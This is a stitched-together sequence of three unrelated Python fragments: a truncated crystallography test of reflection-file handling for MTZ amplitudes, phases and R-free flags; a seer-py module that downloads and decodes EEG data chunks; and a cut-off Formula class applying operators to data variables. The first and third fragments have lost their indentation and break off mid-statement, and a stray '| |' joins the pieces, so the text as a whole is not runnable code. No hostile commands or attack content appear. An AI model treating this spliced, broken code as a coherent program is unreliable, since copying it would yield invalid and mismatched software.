reflection_file_srv.get_amplitudes(
file_name=None,
labels=None,
convert_to_amplitudes_if_necessary=True,
parameter_scope=None,
parameter_name=None)
except Sorry:
assert not show_diff(err.getvalue(), """\
Multiple equally suitable arrays of amplitudes found.
Possible choices:
tmp_rfu2.mtz:F0
tmp_rfu2.mtz:F1
Please specify an unambiguous substring of the target label.
""")
err = reflection_file_srv.err = StringIO()
else:
raise Exception_expected
#
mtz_dataset.add_miller_array(
miller_array=miller_set.array(
data=flex.polar(
flex.random_double(size=miller_set.indices().size()),
flex.random_double(size=miller_set.indices().size()))),
column_root_label="F2")
mtz_dataset.add_miller_array(
miller_array=miller_set.array(
data=flex.random_double(size=miller_set.indices().size()),
sigmas=flex.random_double(size=miller_set.indices().size())/10)
.set_observation_type_xray_intensity(),
column_root_label="F3")
mtz_dataset.add_miller_array(
miller_array=miller_set.array(
data=flex.hendrickson_lattman(miller_set.indices().size(), (0,0,0,0))),
column_root_label="P")
mtz_dataset.mtz_object().write("tmp_rfu3.mtz")
reflection_files = [reflection_file_reader.any_reflection_file(
file_name="tmp_rfu3.mtz")]
err = StringIO()
reflection_file_srv = reflection_file_server(
crystal_symmetry=crystal_symmetry,
force_symmetry=True,
reflection_files=reflection_files,
err=err)
ampl = reflection_file_srv.get_amplitudes(
file_name=None,
labels=["f2"],
convert_to_amplitudes_if_necessary=False,
parameter_scope="amplitudes",
parameter_name="labels")
assert str(ampl.info()) == "tmp_rfu3.mtz:F2,PHIF2"
assert ampl.is_complex_array()
ampl = reflection_file_srv.get_amplitudes(
file_name=None,
labels=["f2"],
convert_to_amplitudes_if_necessary=True,
parameter_scope="amplitudes",
parameter_name="labels")
assert str(ampl.info()) == "tmp_rfu3.mtz:F2"
assert ampl.is_real_array()
ampl = reflection_file_srv.get_amplitudes(
file_name=None,
labels=["f3"],
convert_to_amplitudes_if_necessary=False,
parameter_scope="amplitudes",
parameter_name="labels")
assert str(ampl.info()) == "tmp_rfu3.mtz:F3,SIGF3"
assert ampl.is_xray_intensity_array()
ampl = reflection_file_srv.get_amplitudes(
file_name=None,
labels=["f3"],
convert_to_amplitudes_if_necessary=True,
parameter_scope="amplitudes",
parameter_name="labels")
assert str(ampl.info()) == "tmp_rfu3.mtz:F3,as_amplitude_array"
assert ampl.is_real_array()
ampl = reflection_file_srv.get_amplitudes(
file_name=None,
labels=None,
convert_to_amplitudes_if_necessary=False,
parameter_scope="amplitudes",
parameter_name="labels",
return_all_valid_arrays=True,
strict=True)
assert (len(ampl) == 2)
for f in ampl :
assert (not f.is_xray_intensity_array()) and (not f.is_complex_array())
#
phases = reflection_file_srv.get_phases_deg(
file_name=None,
labels=["f2"],
convert_to_phases_if_necessary=False,
original_phase_units=None,
parameter_scope="phases",
parameter_name="labels")
assert str(phases.info()) == "tmp_rfu3.mtz:F2,PHIF2"
assert phases.is_complex_array()
phases = reflection_file_srv.get_phases_deg(
file_name=None,
labels=["f2"],
convert_to_phases_if_necessary=True,
original_phase_units=None,
parameter_scope=None,
parameter_name="labels")
assert str(phases.info()) == "tmp_rfu3.mtz:PHIF2"
assert phases.is_real_array()
assert flex.mean(phases.data()) > 5
phases = reflection_file_srv.get_phases_deg(
file_name=None,
labels=["PA"],
convert_to_phases_if_necessary=False,
original_phase_units=None,
parameter_scope="phases",
parameter_name="labels")
assert str(phases.info()) == "tmp_rfu3.mtz:PA,PB,PC,PD"
phases = reflection_file_srv.get_phases_deg(
file_name=None,
labels=["PA"],
convert_to_phases_if_necessary=True,
original_phase_units=None,
parameter_scope="phases",
parameter_name="labels")
assert str(phases.info()) \
== "tmp_rfu3.mtz:PA,PB,PC,PD,converted_to_centroid_phases"
assert phases.is_real_array()
for original_phase_units in [None, "deg", "rad"]:
phases = reflection_file_srv.get_phases_deg(
file_name=None,
labels=["F0"],
convert_to_phases_if_necessary=False,
original_phase_units=original_phase_units,
parameter_scope=None,
parameter_name="labels")
if (original_phase_units != "rad"):
assert str(phases.info()) == "tmp_rfu3.mtz:F0"
else:
assert str(phases.info()) == "tmp_rfu3.mtz:F0,converted_to_deg"
def exercise_get_xtal_data():
crystal_symmetry = crystal.symmetry(
unit_cell=(10,11,12,85,95,100),
space_group_symbol="P 1")
miller_set = miller.build_set(
crystal_symmetry=crystal_symmetry,
anomalous_flag=False,
d_min=3)
input_arrays = [miller_set.array(
data=flex.random_double(size=miller_set.indices().size()),
sigmas=flex.random_double(size=miller_set.indices().size())/10)
.set_observation_type_xray_intensity()
for i in [0,1]]
mtz_dataset = input_arrays[0].as_mtz_dataset(column_root_label="F0")
mtz_dataset.mtz_object().write("tmp_rfu1.mtz")
reflection_files = [reflection_file_reader.any_reflection_file(
file_name="tmp_rfu1.mtz")]
reflection_file_srv = reflection_file_server(
crystal_symmetry=crystal_symmetry,
force_symmetry=True,
reflection_files=reflection_files)
f_obs = reflection_file_srv.get_xray_data(
file_name=None,
labels=None,
ignore_all_zeros=False,
parameter_scope="xray_data")
assert str(f_obs.info()) == "tmp_rfu1.mtz:F0,SIGF0"
mtz_dataset.add_miller_array(
miller_array=input_arrays[1], column_root_label="F1")
mtz_dataset.mtz_object().write("tmp_rfu2.mtz")
reflection_files = [reflection_file_reader.any_reflection_file(
file_name="tmp_rfu2.mtz")]
err = StringIO()
reflection_file_srv = reflection_file_server(
crystal_symmetry=crystal_symmetry,
force_symmetry=True,
reflection_files=reflection_files,
err=err)
try:
f_obs = reflection_file_srv.get_xray_data(
file_name=None,
labels=None,
ignore_all_zeros=True,
parameter_scope="xray_data")
except Sorry:
assert err.getvalue() == """\
Multiple equally suitable arrays of observed xray data found.
Possible choices:
tmp_rfu2.mtz:F0,SIGF0
tmp_rfu2.mtz:F1,SIGF1
Please use xray_data.labels
to specify an unambiguous substring of the target label.
"""
err = reflection_file_srv.err = StringIO()
else:
raise Exception_expected
f_obs_list = reflection_file_srv.get_xray_data(
file_name = None,
labels = None,
ignore_all_zeros=True,
parameter_scope="xray_data",
return_all_valid_arrays=True,
minimum_score=1)
assert len(f_obs_list) == 2
f_obs = reflection_file_srv.get_xray_data(
file_name=None,
labels=["F1", "SIGF1"],
ignore_all_zeros=True,
parameter_scope="xray_data")
assert str(f_obs.info()) == "tmp_rfu2.mtz:F1,SIGF1"
try:
f_obs = reflection_file_srv.get_xray_data(
file_name=None,
labels=["F1", "SIGF0"],
ignore_all_zeros=True,
parameter_scope="xray_data")
except Sorry:
assert err.getvalue() == """\
No matching array: xray_data.labels=F1 SIGF0
Possible choices:
tmp_rfu2.mtz:F0,SIGF0
tmp_rfu2.mtz:F1,SIGF1
Please use xray_data.labels
to specify an unambiguous substring of the target label.
"""
err = reflection_file_srv.err = StringIO()
else:
raise Exception_expected
assert len(reflection_file_srv.file_name_miller_arrays) == 1
f_obs = reflection_file_srv.get_xray_data(
file_name="tmp_rfu1.mtz",
labels=None,
ignore_all_zeros=True,
parameter_scope="xray_data")
assert len(reflection_file_srv.file_name_miller_arrays) == 2
assert str(f_obs.info()) == "tmp_rfu1.mtz:F0,SIGF0"
f_obs = reflection_file_srv.get_xray_data(
file_name=os.path.abspath("tmp_rfu1.mtz"),
labels=["sigf0"],
ignore_all_zeros=True,
parameter_scope="xray_data")
assert len(reflection_file_srv.file_name_miller_arrays) == 2
assert str(f_obs.info()) == "tmp_rfu1.mtz:F0,SIGF0"
try:
f_obs = reflection_file_srv.get_xray_data(
file_name=None,
labels=None,
ignore_all_zeros=True,
parameter_scope="xray_data")
except Sorry:
assert err.getvalue() == """\
Multiple equally suitable arrays of observed xray data found.
Possible choices:
tmp_rfu2.mtz:F0,SIGF0
tmp_rfu2.mtz:F1,SIGF1
Please use xray_data.labels
to specify an unambiguous substring of the target label.
"""
err = reflection_file_srv.err = StringIO()
else:
raise Exception_expected
# test preference for anomalous (or merged) data
miller_set = miller.build_set(
crystal_symmetry=crystal_symmetry,
anomalous_flag=True,
d_min=3)
i_obs = miller_set.array(
data=flex.random_double(size=miller_set.indices().size()),
sigmas=flex.random_double(size=miller_set.indices().size())/10
).set_observation_type_xray_intensity()
i_mean = i_obs.average_bijvoet_mates()
mtz_data = i_obs.as_mtz_dataset(column_root_label="I")
mtz_data.add_miller_array(i_mean, column_root_label="I")
mtz_data.mtz_object().write("tmp_rfu3.mtz")
reflection_files = [reflection_file_reader.any_reflection_file(
file_name="tmp_rfu3.mtz")]
reflection_file_srv = reflection_file_server(
crystal_symmetry=crystal_symmetry,
force_symmetry=True,
reflection_files=reflection_files)
err = reflection_file_srv.err = StringIO()
try :
i_obs = reflection_file_srv.get_xray_data(
file_name=None,
labels=None,
ignore_all_zeros=False,
parameter_scope="xray_data")
except Sorry :
pass
i_obs = reflection_file_srv.get_xray_data(
file_name=None,
labels=None,
ignore_all_zeros=False,
parameter_scope="xray_data",
prefer_anomalous=True)
assert (i_obs.info().label_string() == "I(+),SIGI(+),I(-),SIGI(-)")
i_obs = reflection_file_srv.get_xray_data(
file_name=None,
labels=None,
ignore_all_zeros=False,
parameter_scope="xray_data",
prefer_anomalous=False)
assert (i_obs.info().label_string() == "I,SIGI")
def exercise_get_r_free_flags():
crystal_symmetry = crystal.symmetry(
unit_cell=(30,31,32,85,95,100),
space_group_symbol="P 1")
miller_set = miller.build_set(
crystal_symmetry=crystal_symmetry,
anomalous_flag=False,
d_min=3)
n = miller_set.indices().size()
exercise_flag_arrays = []
exercise_flag_arrays.append(
flex.int(list(flex.random_permutation(size=n)%10)))
exercise_flag_arrays.append(flex.int(range(n)))
exercise_flag_arrays.append(flex.int(n, 0))
for style in ["ccp4", "cns", "shelx", "bool"]:
for i_exercise,exercise_flag_array in enumerate(exercise_flag_arrays):
for reversed in [False, True]:
if (style == "ccp4"):
if (reversed): break
data = exercise_flag_array
test_flag_value = 3
else:
if (not reversed):
data = (exercise_flag_array == 0)
test_flag_value = True
else:
data = (exercise_flag_array != 0)
test_flag_value = False
if (style == "cns"):
data = data.as_int()
test_flag_value = int(test_flag_value)
elif (style == "shelx"):
data = -data.as_int()
data.set_selected((data == 0), 1)
if (not reversed): test_flag_value = -1
else: test_flag_value = 1
input_array = miller_set.array(data=data)
mtz_dataset = input_array.as_mtz_dataset(
column_root_label="FreeRflags")
mtz_dataset.mtz_object().write("tmp.mtz")
reflection_files = [reflection_file_reader.any_reflection_file(
file_name="tmp.mtz")]
err = StringIO()
reflection_file_srv = reflection_file_server(
crystal_symmetry=crystal_symmetry,
force_symmetry=True,
reflection_files=reflection_files,
err=err)
for trial_test_flag_value in [None, test_flag_value]:
for trial_label in [None, "free", "foo"]:
try:
r_free_flags, actual_test_flag_value = \
reflection_file_srv.get_r_free_flags(
file_name=None,
label=trial_label,
test_flag_value=trial_test_flag_value,
disable_suitability_test=False,
parameter_scope="r_free_flags")
except Sorry as e:
if (trial_label != "foo"):
assert i_exercise > 0
if (trial_label is None):
assert str(e) == """\
No array of R-free flags found.
For manual selection define:
r_free_flags.label
r_free_flags.test_flag_value
r_free_flags.disable_suitability_test=True"""
else:
assert str(e) == \
"Not a suitable array of R-free flags:" \
+ " r_free_flags.label=free\n" \
+ "To override the suitability test define:" \
+ " r_free_flags.disable_suitability_test=True"
else:
assert str(e) == "No matching array: r_free_flags.label=foo"
if (i_exercise == 0):
assert err.getvalue() == """\
No matching array: r_free_flags.label=foo
Possible choices:
tmp.mtz:FreeRflags
Please use r_free_flags.label
to specify an unambiguous substring of the target label.
"""
else:
assert err.getvalue() == """\
No matching array: r_free_flags.label=foo
"""
err = reflection_file_srv.err = StringIO()
else:
assert i_exercise == 0
actual_test_flag_value_2 = guess_r_free_flag_value(
miller_array=r_free_flags,
test_flag_value=trial_test_flag_value)
assert (actual_test_flag_value_2 == actual_test_flag_value)
for second_label in ["test", "foo"]:
input_array = miller_set.array(data=exercise_flag_arrays[0])
mtz_dataset = input_array.as_mtz_dataset(
column_root_label="FreeRflags")
mtz_dataset.add_miller_array(
miller_array=input_array,
column_root_label=second_label)
mtz_dataset.mtz_object().write("tmp.mtz")
reflection_files = [reflection_file_reader.any_reflection_file(
file_name="tmp.mtz")]
err = StringIO()
reflection_file_srv = reflection_file_server(
crystal_symmetry=crystal_symmetry,
force_symmetry=True,
reflection_files=reflection_files,
err=err)
try:
reflection_file_srv.get_r_free_flags(
file_name=None,
label=None,
test_flag_value=None,
disable_suitability_test=False,
parameter_scope="r_free_flags")
except Sorry as e:
assert str(e)=="Multiple equally suitable arrays of R-free flags found."
assert err.getvalue() == """\
Multiple equally suitable arrays of R-free flags found.
Possible choices:
tmp.mtz:FreeRflags
tmp.mtz:test
Please use r_free_flags.label
to specify an unambiguous substring of the target label.
"""
err = reflection_file_srv.err = StringIO()
else:
assert str(r_free_flags.info()) == "tmp.mtz:FreeRflags"
r_free_flags, actual_test_flag_value = \
reflection_file_srv.get_r_free_flags(
file_name=None,
label="FreeRflags",
test_flag_value=3,
disable_suitability_test=True,
parameter_scope="r_free_flags")
assert r_free_flags.info().label_string() == "FreeRflags"
assert actual_test_flag_value == 3
for label,test_flag_value in [(None,3), ("FreeRflags",None)]:
try:
reflection_file_srv.get_r_free_flags(
file_name=None,
label=label,
test_flag_value=test_flag_value,
disable_suitability_test=True,
parameter_scope="r_free_flags")
except Sorry as e:
assert str(e) == "r_free_flags.disable_suitability_test=True:" \
" Suitability test for R-free flags can only be disabled if both" \
" r_free_flags.label and r_free_flags.test_flag_value are defined."
else: raise Exception_expected
# test corrupted R-free flags
r_free_flags = miller_set.generate_r_free_flags()
int_flags = r_free_flags.data().as_int()
int_flags[100] = 10000000
r_free_flags = r_free_flags.customized_copy(data=int_flags)
mtz_dataset = r_free_flags.as_mtz_dataset(
column_root_label="TEST")
mtz_dataset.mtz_object().write("tmp.mtz")
reflection_files = [reflection_file_reader.any_reflection_file(
file_name="tmp.mtz")]
err = StringIO()
reflection_file_srv = reflection_file_server(
crystal_symmetry=crystal_symmetry,
force_symmetry=True,
reflection_files=reflection_files,
err=err)
flags, value = reflection_file_srv.get_r_free_flags(
| |
<reponame>seermedical/seer-py
"""
Utility and helper functions for downloading data, as well as plotting.
Copyright 2017 Seer Medical Pty Ltd, Inc. or its affiliates. All Rights Reserved.
"""
import functools
import gzip
import logging
import time
from multiprocessing import Pool
import os
import numpy as np
import pandas as pd
import requests
logger = logging.getLogger(__name__)
# pylint:disable=too-many-locals,too-many-statements
def download_channel_data(data_q, download_function):
"""
Download data for a single segment, decompress if needed, convert to numeric type & apply
exponentiation etc, and return as a DataFrame.
Parameters
----------
data_q : list of list
A list containing 5 elements:
- A row from a metadata DataFrame with fields including: a data chunk URL,
timestamp, sample encoding, sample rate, compression, signal min/max
exponent etc. See `get_channel_data` for series derivation
- study_id : str
- channel_group_id : str
- segment_id : str
- channel_names: list of str
download_function : callable
A function that will be used to attempt to download data from the URL
defined in data_q[0]['dataChunks.url']
Returns
-------
data_df : pd.DataFrame
DataFrame with columns 'time', 'id', 'channelGroups.id', 'segments.id',
and a column with data for each channel in channel_names
"""
meta_data, study_id, channel_groups_id, segment_id, channel_names = data_q
try:
data = _get_data_chunk(study_id, meta_data, download_function)
if data is None:
return None
data_type = meta_data['channelGroups.sampleEncoding']
data = np.frombuffer(data, dtype=np.dtype(data_type))
data = data.astype(np.float32)
column_names = channel_names
if meta_data['channelGroups.timestamped']:
# timestamped data is not stored in records as EDF data is
# it is just a sequence of (ts1, ch1, ch2, ..., chN), (ts2, ch1, ch2, ..., chN), ...
# the timestamp is milliseconds relative to chunk start
column_names = ['time'] + channel_names
data = data.reshape(-1, len(column_names))
else:
try:
# EDF data is in the format [record 1: (ch1 sample1, ch1 sample2, ..., ch1 sampleN),
# (ch2 sample1, ch2 sample2, ..., ch2 sampleN), ...][record2: ...], ..., [recordN: ...]
data = data.reshape(-1, len(channel_names),
int(meta_data['channelGroups.samplesPerRecord']))
# We have a catch for 'ValueError' when calling 'reshape',
# because it is a known issue with some EDF files that have a duration
# not evenly divisible by 1000 (i.e. not whole seconds) that were processed
# by seer-worker before the relevant bug was fixed. That bug caused
# those EDF files to be re-written with an extra record's worth
# of samples, so if we chop the empty record of samples off the end
# all should be right with the world.
except ValueError:
samples_per_record = int(meta_data['channelGroups.samplesPerRecord'])
# For segments affected by the seer-worker bug mentioned above
# that also had a sample count that didn't divide evenly
# into the samplesPerRecord attribute, the logic that fills in
# values to even out the sample counts would fill in extra samples
# beyond the extra record's worth of samples as well. Since this
# excess is not based on any known attributes of the channel group,
# segment, or existing data files, we have to guess that excess samples
# that don't divide evenly into samples_per_record are likely due
# to the known bug and can be safely pruned.
excess_samples = (len(data) % samples_per_record) + samples_per_record
data = data[:-excess_samples].reshape(
-1, len(channel_names), int(meta_data['channelGroups.samplesPerRecord']))
data = np.transpose(data, (0, 2, 1))
data = data.reshape(-1, data.shape[2])
if 'int' in data_type:
# EDF int format data encodes missing values as the minimum possible int value
# first remove any minimum ints at the end of the data
nan_mask = np.all(data == np.iinfo(np.dtype(data_type)).min, axis=1)
if nan_mask[-1]:
nan_mask_corrected = np.ones(nan_mask.shape, dtype=bool)
for i in range(len(nan_mask) - 1, -1, -1):
if nan_mask[i]:
nan_mask_corrected[i] = False
else:
break
data = data[nan_mask_corrected]
# now convert any internal minimum ints into nans
data[np.all(data == np.iinfo(np.dtype(data_type)).min, axis=1), :] = np.nan
# this converts the int values which are in a range between minimum int and maximum int,
# into float values in a range between signalMin and signalMax
chan_min = meta_data['channelGroups.signalMin'].astype(np.float64)
chan_max = meta_data['channelGroups.signalMax'].astype(np.float64)
chan_diff = chan_max - chan_min
dig_min = np.iinfo(data_type).min
dig_max = np.iinfo(data_type).max
dig_diff = abs(dig_min) + abs(dig_max)
with np.errstate(divide='ignore', invalid='ignore'):
data = (data - dig_min) / dig_diff * chan_diff + chan_min
data = pd.DataFrame(data=data, index=None, columns=column_names)
exponent = meta_data['channelGroups.exponent'].astype(np.float64)
data[channel_names] = data[channel_names] * 10.0**exponent
data = data.fillna(method='ffill', axis='columns')
data = data.fillna(method='bfill', axis='columns')
data = data.fillna(value=0., axis='columns')
if meta_data['channelGroups.timestamped']:
# data timestamp is relative to chunk start
# make sure both are float64 - sometimes mixed float arithmetic gives strange results
data['time'] = (data['time'].astype(np.float64)
+ meta_data['dataChunks.time'].astype(np.float64))
else:
data['time'] = (np.arange(data.shape[0]) *
(1000.0 / meta_data['channelGroups.sampleRate'])
+ meta_data['dataChunks.time'])
data['id'] = study_id
data['channelGroups.id'] = channel_groups_id
data['segments.id'] = segment_id
data = data[['time', 'id', 'channelGroups.id', 'segments.id'] + channel_names]
# chunks are all the same size for a given channel group (usually 10s)
# if they don't contain that much data they are padded out
# this discards any padding at the end of a segment before the data is returned
segment_end = meta_data['segments.startTime'] + meta_data['segments.duration']
data = data[data['time'] < segment_end]
return data
except Exception as ex:
logger.error(f"{repr(ex)}:\nstudy_id: {study_id}\nchannel_names: {channel_names}\n"
f"dataChunks.url: {meta_data['dataChunks.url']}\ndataChunks.time: "
f"{meta_data['dataChunks.time']:.2f}\nmeta_data: {meta_data}")
raise
def _get_data_chunk(study_id, meta_data, download_function):
"""
Internal function. Download a single chunk of data and decompress if needed. If the supplied
download_function is compatabile with requests.get, it will retry if certain recoverable errors
are encountered (500, 503), or will return None if a 404 error is encountered.
Parameters
----------
study_id : str
The id of the study the data chunk belongs to
meta_data : Dataframe
A metadata DataFrame with fields including: a data chunk URL, timestamp, sample encoding,
sample rate, compression, signal min/max, exponent etc. See `get_channel_data` for series
derivation
download_function : callable
A function that will be used to download data from the URL in meta_data['dataChunks.url']
Returns
-------
data : byte buffer
The data returned from the given URL by the given download_function, potentially
decompressed
"""
max_attempts = 3
for i in range(max_attempts):
response = download_function(meta_data['dataChunks.url'])
data = response.content
try:
status_code = response.status_code
except AttributeError:
break # the download function used does not return a status_code
try:
reason = response.reason
except AttributeError:
reason = 'unknown reason'
if status_code == 200:
break
logger.warning(f"download_channel_data(): {status_code} status code returned: {reason}\n"
f"response content {data}\nstudy_id: {study_id}\ndataChunks.url: "
f"{meta_data['dataChunks.url']}\ndataChunks.time: "
f"{meta_data['dataChunks.time']:.2f}\nmeta_data: {meta_data}")
if status_code == 404:
# we sometimes get chunk URLs which don't exist
logger.warning('The chunk requested does not exist')
return None
if status_code in (500, 503):
# S3 sometimes returns 500 or 503 if it's overwhelmed; retry
message = 'Unable to read chunk - most likely a performance error'
if i < (max_attempts - 1):
sleep_for = 2**(i + 1) # Just a tiny sleep
logger.info(f'{message} - sleeping for {sleep_for} then retrying')
time.sleep(sleep_for)
continue
logger.error(f'{message} - max attempts exceeded')
# throw an error for other status codes
raise requests.exceptions.HTTPError(f'HTTPError {status_code}')
try:
if meta_data['channelGroups.compression'] == 'gzip':
data = gzip.decompress(data)
except OSError:
pass
return data
# pylint:disable=too-many-locals
def create_data_chunk_urls(metadata, segment_urls, from_time=0, to_time=9e12):
"""
Get URLs and timestamps for data chunks listed in a metadata DataFrame.
Parameters
----------
metadata : pd.DataFrame
Study metadata as returned by seerpy.get_all_study_metadata_dataframe_by_*()
segment_urls : pd.DataFrame
DataFrame with columns 'segments.id', and 'baseDataChunkUrl', as returned
by seerpy.get_segment_urls()
from_time : float, optional
Only include data chunks that end after this time
to_time : float, optional
Only include data chunks that start before this time
Returns
-------
download_df : pd.DataFrame
A DataFrame with columns 'segments.id', 'dataChunks.url' and 'dataChunks.time',
which can be used to download data chunks in a segment
"""
chunk_pattern = '00000000000.dat'
data_chunks = []
metadata = metadata.drop_duplicates('segments.id').reset_index(drop=True)
for index in range(len(metadata.index)):
row = metadata.iloc[index]
seg_base_urls = segment_urls.loc[segment_urls['segments.id'] == row['segments.id'],
'baseDataChunkUrl']
if seg_base_urls.empty:
continue
seg_base_url = seg_base_urls.iloc[0]
chunk_period = row['channelGroups.chunkPeriod']
num_chunks = int(np.ceil(row['segments.duration'] / chunk_period / 1000.))
start_time = row['segments.startTime']
for i in range(num_chunks):
chunk_start_time = chunk_period * 1000 * i + start_time
next_chunk_start_time = chunk_period * 1000 * (i + 1) + start_time
if chunk_start_time < to_time and next_chunk_start_time > from_time:
data_chunk_name = str(i).zfill(len(chunk_pattern) - 4) + chunk_pattern[-4:]
data_chunk_url = seg_base_url.replace(chunk_pattern, data_chunk_name)
data_chunk = [row['segments.id'], data_chunk_url, chunk_start_time]
data_chunks.append(data_chunk)
return pd.DataFrame.from_records(data_chunks,
columns=['segments.id', 'dataChunks.url', 'dataChunks.time'])
# pylint:disable=too-many-locals,too-many-arguments
def get_channel_data(study_metadata, segment_urls, download_function=requests.get, threads=None,
from_time=0, to_time=9e12):
"""
Download data chunks and stitch together into a | |
operator, var_right)] = {}
elif is_numeric_str(var_left):
if type(var_right) == Data:
for v_right in var_right.variables():
res[Formula.__name_data(var_left, operator, v_right)] = {}
elif is_numeric_str(var_right):
res[Formula.__name_data(var_left, operator, var_right)] = {}
else:
variable_right = Variable.from_data(
data, var_right)
if variable_right.type == Variable_Types.categorical:
vals_right = variable_right.values(Sample(data))[:-1] if skip_collinear else variable_right.values(Sample(data))
for val_right in vals_right:
res[Formula.__name_data(var_left, operator, f'{var_right}={val_right}')] = {}
elif variable_right.type == Variable_Types.numeric:
res[Formula.__name_data(var_left, operator, var_right)] = {}
else:
if var_left in data.variables(): # var_left == variable in sample
variable_left = Variable.from_data(data, var_left)
if variable_left.type == Variable_Types.categorical:
vals_left = variable_left.values(Sample(data))[:-1] if skip_collinear else variable_left.values(Sample(data))
if type(var_right) == Data:
for val_left in vals_left:
for v_right in var_right.values:
res[Formula.__name_data(f'({var_left}={val_left})', operator, v_right)] = {}
elif is_numeric_str(var_right):
for val_left in vals_left:
res[Formula.__name_data(f'({var_left}={val_left})', operator, var_right)] = {}
else:
if var_right in data.variables(): # var_right == a variable in sample
variable_right = Variable.from_data(
data, var_right)
if variable_right.type == Variable_Types.categorical:
vals_right = variable_right.values(Sample(data))[:-1] if skip_collinear else variable_right.values(Sample(data))
for val_left in vals_left:
for val_right in vals_right:
res[Formula.__name_data(f'({var_left}={val_left})', operator, f'{var_right}={val_right}')] = {}
elif variable_right.type == Variable_Types.numeric:
for val_left in vals_left:
res[Formula.__name_data(f'({var_left}={val_left})', operator, var_right)] = {}
else: # var_right == a text value, operator == '=' or '!='
res[Formula.__name_data(var_left, operator, var_right)] = {}
elif variable_left.type == Variable_Types.numeric:
if type(var_right) == Data:
for v_right in var_right.values:
res[Formula.__name_data(var_left, operator, v_right)] = {}
elif is_numeric_str(var_right):
res[Formula.__name_data(var_left, operator, var_right)] = {}
else:
variable_right = Variable.from_data(
data, var_right)
if variable_right.type == Variable_Types.categorical:
vals_right = variable_right.values(Sample(data))[:-1] if skip_collinear else variable_right.values(Sample(data))
for val_right in vals_right:
res[Formula.__name_data(var_left, operator, f'({var_right}={val_right})')] = {}
elif variable_right.type == Variable_Types.numeric:
res[Formula.__name_data(var_left, operator, var_right)] = {}
else: # var_left == a text value
if type(var_right) == Data:
for v_right in var_right.variables():
res[Formula.__name_data(var_left, operator, v_right)] = {}
elif not is_numeric_str(var_right):
res[Formula.__name_data(var_left, operator, var_right)] = {}
## calculates
for i in data.index():
if type(var_left) == Data:
if type(var_right) == Data:
for v_left in var_left.values:
for v_right in var_right.values:
if operator == '+':
res[Formula.__name_data(v_left, operator, v_right)][i] = var_left.values[v_left][i] + \
var_right.values[v_right][i]
elif operator == '-':
res[Formula.__name_data(v_left, operator, v_right)][i] = var_left.values[v_left][i] - \
var_right.values[v_right][i]
elif operator == '*':
res[Formula.__name_data(v_left, operator, v_right)][i] = var_left.values[v_left][i] * \
var_right.values[v_right][i]
elif operator == '/':
if var_right.values[v_right][i] != 0:
res[Formula.__name_data(v_left, operator, v_right)][i] = var_left.values[v_left][i] / \
var_right.values[v_right][i]
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = np.nan
elif operator == '^':
res[Formula.__name_data(v_left, operator, v_right)][i] = var_left.values[v_left][i] ** \
var_right.values[v_right][i]
elif np.isnan(var_left.values[v_left][i]) or np.isnan(var_right.values[v_right][i]):
res[Formula.__name_data(v_left, operator, v_right)][i] = np.nan
elif operator == '=':
if var_left.values[v_left][i] == var_right.values[v_right][i]:
res[Formula.__name_data(v_left, operator, v_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = 0
elif operator == '!=':
if var_left.values[v_left][i] != var_right.values[v_right][i]:
res[Formula.__name_data(v_left, operator, v_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = 0
elif operator == '<':
if var_left.values[v_left][i] < var_right.values[v_right][i]:
res[Formula.__name_data(v_left, operator, v_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = 0
elif operator == '>':
if var_left.values[v_left][i] > var_right.values[v_right][i]:
res[Formula.__name_data(v_left, operator, v_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = 0
elif operator == '<=':
if var_left.values[v_left][i] <= var_right.values[v_right][i]:
res[Formula.__name_data(v_left, operator, v_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = 0
elif operator == '>=':
if var_left.values[v_left][i] >= var_right.values[v_right][i]:
res[Formula.__name_data(v_left, operator, v_right)][i] = 1
else:
res[Formula.__name_data(v_left, operator, v_right)][i] = 0
elif is_numeric_str(var_right):
for v_left in var_left.values:
if operator == '+':
res[Formula.__name_data(v_left, operator, var_right)][i] = var_left.values[v_left][i] + float(var_right)
elif operator == '-':
res[Formula.__name_data(v_left, operator, var_right)][i] = var_left.values[v_left][i] - float(var_right)
elif operator == '*':
res[Formula.__name_data(v_left, operator, var_right)][i] = var_left.values[v_left][i] * float(var_right)
elif operator == '/':
if float(var_right) != 0:
res[Formula.__name_data(v_left, operator, var_right)][i] = var_left.values[v_left][i] / float(var_right)
else:
res[Formula.__name_data(v_left, operator, var_right)][i] = np.nan
elif operator == '^':
res[Formula.__name_data(v_left, operator, var_right)][i] = var_left.values[v_left][i] ** float(var_right)
elif np.isnan(var_left.values[v_left][i]):
res[Formula.__name_data(v_left, operator, var_right)][i] = np.nan
elif operator == '=':
if var_left.values[v_left][i] == float(var_right):
res[Formula.__name_data(
v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(
v_left, operator, var_right)][i] = 0
elif operator == '!=':
if var_left.values[v_left][i] != float(var_right):
res[Formula.__name_data(
v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(
v_left, operator, var_right)][i] = 0
elif operator == '<':
if var_left.values[v_left][i] < float(var_right):
res[Formula.__name_data(
v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(
v_left, operator, var_right)][i] = 0
elif operator == '>':
if var_left.values[v_left][i] > float(var_right):
res[Formula.__name_data(
v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(
v_left, operator, var_right)][i] = 0
elif operator == '<=':
if var_left.values[v_left][i] <= float(var_right):
res[Formula.__name_data(
v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(
v_left, operator, var_right)][i] = 0
elif operator == '>=':
if var_left.values[v_left][i] >= float(var_right):
res[Formula.__name_data(
v_left, operator, var_right)][i] = 1
else:
res[Formula.__name_data(
v_left, operator, var_right)][i] = 0
else:
if var_right in data.variables(): # var_right == a variable in sample
variable_right = Variable.from_data(data, var_right)
if variable_right.type == Variable_Types.categorical:
vals_right = variable_right.values(Sample(data))[:-1] if skip_collinear else variable_right.values(Sample(data))
for v_left in var_left.values:
for val_right in vals_right:
if not is_numeric(data.values[var_right][i]):
if data.values[var_right][i] == val_right:
if operator == '+':
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
var_left.values[v_left][i] + 1
elif operator == '-':
res[Formula.__name_data(v_left, operator, f'({var_right}={val_right})')][i] = \
var_left.values[v_left][i] - 1
elif operator in ['*', '/', '^']:
